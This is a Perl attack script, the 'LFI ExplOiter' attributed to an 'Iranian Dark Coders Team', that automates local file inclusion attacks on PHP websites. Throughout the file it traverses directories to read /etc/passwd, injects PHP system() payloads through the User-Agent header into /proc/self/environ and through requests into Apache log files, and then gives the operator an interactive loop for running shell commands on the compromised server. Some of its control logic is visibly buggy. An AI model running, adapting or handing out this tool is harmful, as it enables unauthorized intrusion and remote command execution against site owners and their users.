#!/usr/bin/perl

#Iranian Dark Coders Team
#WwW.IDC-TeaM.NeT
#Coded BY M.R.S.CO 
#We Are : M.R.S.CO , N3O , Black.Hack3r
#LFI ExplOiter
#ver : 1.1
system(($^O eq 'MSWin32') ? 'cls' : 'clear'); 
print q (

                --=[LFI ExplOiter
        +---++---==[Version : 1.1
        +---++---==[Update Date : [2013/09/03]
                --=[Code name : DarkAngel

);
$SIG{INT} = \&interrupt;
sub interrupt {
	print "\n[+] (Ctrl + C) Detected, shutting down\n";
	exit;  # or just about anything else you'd want to do
}
use LWP::UserAgent;
use LWP::Simple;
$ua = LWP::UserAgent ->new;
$ua->timeout(15);
$ua->agent('LFI Expl0iter');
print "\n\t Enter Target [Example:http://site.il/idc.php?id=]";
print "\n\n \t Enter Target : ";
$Target=<STDIN>;
chomp($Target);
if($Target !~ /http:\/\//) { $Target = "http://$host"; };


$tf=1;$t=0;
print "\n\n\t\t[+] processing ...\n\n\n";
print "[+] Finding passwd\n";


while($tf==1)
{
  $t=$t+1;
  if ($t==25){print "[+] Passwd Not Found!!"; goto en;}
  $dot=$dot . "../";
  
  $source=get $Target . $dot . "etc/passwd";
  $source2=get $Target .$dot . "etc/passwd%00";
  
  if (($source =~ m/:root:/i || $source =~ m/:x:/i || $source =~ m/:0:/i))
  {
	 $u="";
     $tf=2;
  }
 if (($source2 =~ m/:root:/i || $source2 =~ m/:x:/i || $source2 =~ m/:0:/i))
  {
	 $u="%00";
     $tf=2;
  } 
}

print "Passwd Path : " . $Target . $dot . "etc/passwd" . $u . "\n\n OS is Linux \n";

print "\n[+] Finding environ\n";

  $ua->agent('<?php echo md5("idc"); system("dir"); echo md5("darkcoders"); ?>');
  $source=$ua->get($Target . $dot . "proc/self/environ" . $u);
if ($source =~ "cca5e614d1755faf382e2c678bd45a19" || $source =~ "cc5626d72060f33213f000693616ff9e")
{
   print "environ Path : \n" . $Target . $dot . "proc/self/environ" . $u . "\n"; 
   print "\n[+] Testing environ method\n";
  $ua->agent('<?php echo md5("idc"); system("idc"); echo md5("darkcoders"); ?>');
  $response=$ua->get($Target . $dot . "proc/self/environ" . $u);
  if ($response->decoded_content =~ "cca5e614d1755faf382e2c678bd45a19")
  {
    print "\nenviron method is Exploitable\nAre You Test other method ? (y/N)";
    chomp($xx=<STDIN>);
    if ($xx =~ 'N' || $xx =~ 'n'){
    while($cmd=="exit")
    {
      print "\n\nEnter Your Command : ";
      $cmd=<STDIN>;
      chomp($cmd);
      $ua->agent('<?php echo md5("idc"); system("' . $cmd . '"); echo md5("darkcoders"); ?>');
      $response=$ua->get($Target . $dot . "proc/self/environ" . $u);
      $between=substr($response->decoded_content, index($response->decoded_content, 'cca5e614d1755faf382e2c678bd45a19')+32, index($response->decoded_content, 'cc5626d72060f33213f000693616ff9e') - index($response->decoded_content, 'cca5e614d1755faf382e2c678bd45a19')-32);
      print "\n". $between;
     }}
  }else{ print "\n[+] environ method is dont work !\n";}
}else{print "\n[+] environ is Not Found !\n";}


en:;
$source=get $Target."../../../../../../../../../windows/win.ini";
 if (($source =~ m/mod=MPEGVideo/i || $source =~ m/MCI Extensions.BAK/i || $source =~ m/extensions/i || $source =~ m/OLEMessaging/i || $source =~ m/Windows XP/i))
  {
     print "\n[+]  OS is Windows \n ";
  } 
  
  
     print "\n[+] Finding logs \n ";
@lfi = ('../apache/logs/error.log',
'../apache/logs/access.log',
'../../apache/logs/error.log',
'../../apache/logs/access.log',
'../../../apache/logs/error.log',
'../../../apache/logs/access.log',
'../../../../../../../etc/httpd/logs/acces_log',
'../../../../../../../etc/httpd/logs/acces.log',
'../../../../../../../etc/httpd/logs/error_log',
'../../../../../../../etc/httpd/logs/error.log',
'../../../../../../../var/www/logs/access_log',
'../../../../../../../var/www/logs/access.log',
'../../../../../../../usr/local/apache/logs/access_ log',
'../../../../../../../usr/local/apache/logs/access. log',
'../../../../../../../var/log/apache/access_log',
'../../../../../../../var/log/apache2/access_log',
'../../../../../../../var/log/apache/access.log',
'../../../../../../../var/log/apache2/access.log',
'../../../../../../../var/log/access_log',
'../../../../../../../var/log/access.log',
'../../../../../../../var/www/logs/error_log',
'../../../../../../../var/www/logs/error.log',
'../../../../../../../usr/local/apache/logs/error_l og',
'../../../../../../../usr/local/apache/logs/error.l og',
'../../../../../../../var/log/apache/error_log',
'../../../../../../../var/log/apache2/error_log',
'../../../../../../../var/log/apache/error.log',
'../../../../../../../var/log/apache2/error.log',
'../../../../../../../var/log/error_log',
'../../../../../../../var/log/error.log',
'../../../../../../../../../../../../var/log/httpd/access_log',
'../../../../../../../../../../../../var/log/httpd/error_log',
'../../../../../../../../../../var/log/httpd/access_log',
'../../../../../../../../../../var/log/httpd/error_log',
'../apache/logs/error.log',
'../apache/logs/access.log',
'../../apache/logs/error.log',
'../../apache/logs/access.log',
'../../../apache/logs/error.log',
'../../../apache/logs/access.log',
'../../../../apache/logs/error.log',
'../../../../apache/logs/access.log',
'../../../../../apache/logs/error.log',
'../../../../../apache/logs/access.log',
'../apache2/logs/error.log',
'../apache2/logs/access.log',
'../../apache2/logs/error.log',
'../../apache2/logs/access.log',
'../../../apache2/logs/error.log',
'../../../apache2/logs/access.log',
'../../../../apache2/logs/error.log',
'../../../../apache2/logs/access.log',
'../../../../../apache2/logs/error.log',
'../../../../../apache2/logs/access.log',
'../logs/error.log',
'../logs/apache_error.log',
'../logs/access.log',
'../../logs/error.log',
'../../logs/access.log',
'../../../logs/error.log',
'../../../logs/access.log',
'../../../../logs/error.log',
'../../../../logs/access.log',
'../../../../../logs/error.log',
'../../../../../logs/access.log',
'../../../../../../../../../../etc/httpd/logs/acces_log',
'../../../../../../../../../../etc/httpd/logs/acces.log',
'../../../../../../../../../../etc/httpd/logs/error_log',
'../../../../../../../../../../etc/httpd/logs/error.log',
'../../../../../../../../../../usr/local/apache/logs/access_log',
'../../../../../../../../../../usr/local/apache/logs/access.log',
'../../../../../../../../../../usr/local/apache/logs/error_log',
'../../../../../../../../../../usr/local/apache/logs/error.log',
'../../../../../../../../../../usr/local/apache2/logs/access_log',
'../../../../../../../../../../usr/local/apache2/logs/access.log',
'../../../../../../../../../../usr/local/apache2/logs/error_log',
'../../../../../../../../../../usr/local/apache2/logs/error.log',
'../../../../../../../../../../var/www/logs/access_log',
'../../../../../../../../../../var/www/logs/access.log',
'../../../../../../../../../../var/www/logs/error_log',
'../../../../../../../../../../var/www/logs/error.log',
'../../../../../../../../../../var/log/httpd/access_log',
'../../../../../../../../../../var/log/httpd/access.log',
'../../../../../../../../../../var/log/httpd/error_log',
'../../../../../../../../../../var/log/httpd/error.log',
'../../../../../../../../../../var/log/apache/access_log',
'../../../../../../../../../../var/log/apache/access.log',
'../../../../../../../../../../var/log/apache/error_log',
'../../../../../../../../../../var/log/apache/error.log',
'../../../../../../../../../../var/log/apache2/access_log',
'../../../../../../../../../../var/log/apache2/access.log',
'../../../../../../../../../../var/log/apache2/error_log',
'../../../../../../../../../../var/log/apache2/error.log',
'../../../../../../../../../../var/log/access_log',
'../../../../../../../../../../var/log/access.log',
'../../../../../../../../../../var/log/error_log',
'../../../../../../../../../../var/log/error.log',
'../../../../../../../../../../opt/lampp/logs/access_log',
'../../../../../../../../../../opt/lampp/logs/error_log',
'../../../../../../../../../../opt/xampp/logs/access_log',
'../../../../../../../../../../opt/xampp/logs/error_log',
'../../../../../../../../../../opt/lampp/logs/access.log',
'../../../../../../../../../../opt/lampp/logs/error.log',
'../../../../../../../../../../opt/xampp/logs/access.log',
'../../../../../../../../../../opt/xampp/logs/error.log',
'../../../../../../../../../../Program Files\Apache Group\Apache\logs\access.log',
'../../../../../../../../../../Program Files\Apache Group\Apache\logs\error.log',
'../../../apache/logs/error.log',
'../../../apache/logs/access.log',
'../../../../apache/logs/error.log',
'../../../../apache/logs/access.log',
'../../../../../apache/logs/error.log',
'../../../../../apache/logs/access.log',
'../../../../../../apache/logs/error.log',
'../../../../../../apache/logs/access.log',
'../../../../../../../apache/logs/error.log',
'../../../../../../../apache/logs/access.log',
'../../../../../../../../apache/logs/error.log',
'../../../../../../../../apache/logs/access.log',
'../../../logs/error.log',
'../../../logs/access.log',
'../../../../logs/error.log',
'../../../../logs/access.log',
'../../../../../logs/error.log',
'../../../../../logs/access.log',
'../../../../../../logs/error.log',
'../../../../../../logs/access.log',
'../../../../../../../logs/error.log',
'../../../../../../../logs/access.log',
'../../../../../../../../logs/error.log',
'../../../../../../../../logs/access.log',
'../../../../../../../../../../../../etc/httpd/logs/acces_log',
'../../../../../../../../../../../../etc/httpd/logs/acces.log',
'../../../../../../../../../../../../etc/httpd/logs/error_log',
'../../../../../../../../../../../../etc/httpd/logs/error.log',
'../../../../../../../../../../../../var/www/logs/access_log',
'../../../../../../../../../../../../var/www/logs/access.log',
'../../../../../../../../../../../../usr/local/apache/logs/access_log',
'../../../../../../../../../../../../usr/local/apache/logs/access.log',
'../../../../../../../../../../../../var/log/apache/access_log',
'../../../../../../../../../../../../var/log/apache/access.log',
'../../../../../../../../../../../../var/log/access_log',
'../../../../../../../../../../../../var/www/logs/error_log',
'../../../../../../../../../../../../var/www/logs/error.log',
'../../../../../../../../../../../../usr/local/apache/logs/error_log',
'../../../../../../../../../../../../usr/local/apache/logs/error.log',
'../../../../../../../../../../../../var/log/apache/error_log',
'../../../../../../../../../../../../var/log/apache/error.log',
'../../../../../../../../../../../../var/log/access_log',
'../../../../../../../../../../../../var/log/error_log');
$ff=0;
foreach $scan(@lfi){

$source=get $Target.$scan . "&<?php echo(md5('idc')); system($_GET['idc']); echo md5('darkcoders'); ?>";
 if (($source =~ m/cca5e614d1755faf382e2c678bd45a19/i || $source =~ m/cc5626d72060f33213f000693616ff9e/i ))
  {
     print "\n" . $Target.$scan;
     $ff=1; 
      print "\n[+] logs method is Exploitable\n Are You Test other method ? (y/N)";
    chomp($x=<STDIN>);
    if ($x="N"){
    while($cmd=="exit")
    {
      print "\n\nEnter Your Command : ";
      $cmd=<STDIN>;
      chomp($cmd);
      $ua->agent('LFI Expl0iter');

	  $response=$ua->get($source=get $Target.$scan."&idc=".$cmd);
      $between=substr($response->decoded_content, index($response->decoded_content, 'idc-team')+8, index($response->decoded_content, 'mrsco') - index($response->decoded_content, 'idc-team')-8);
      print "\n". $between;
}}}

$source=get $Target.$scan . "%00&<?php echo(md5('idc')); system($_GET['idc']); echo md5('darkcoders'); ?>";
$source=get $Target.$scan . "%00&<?php echo(md5('idc')); system($_GET['idc']); echo md5('darkcoders'); ?>";
 if (($source =~ m/cca5e614d1755faf382e2c678bd45a19/i || $source =~ m/cc5626d72060f33213f000693616ff9e/i ))
  {
     print "\n" . $Target.$scan."%00";
     $ff=1; 
      print "\n[+] logs method is work\n Are You Test other method ? (Y/N)";
    chomp($x=<STDIN>);
    if ($x="N"){
    while($cmd=="exit")
    {
      print "\n\nEnter Your Command : ";
      $cmd=<STDIN>;
      chomp($cmd);
      $ua->agent('LFI Expl0iter');

	  $response=$ua->get($source=get $Target.$scan."%00&idc=echo 'idc-team' ; ".$cmd."echo 'mrsco'");
      $between=substr($response->decoded_content, index($response->decoded_content, 'idc-team')+8, index($response->decoded_content, 'mrsco') - index($response->decoded_content, 'idc-team')-8);
      print "\n". $between;
}}}

}
if ($ff==0){print ("\n[+] LOG not found ! \n");}
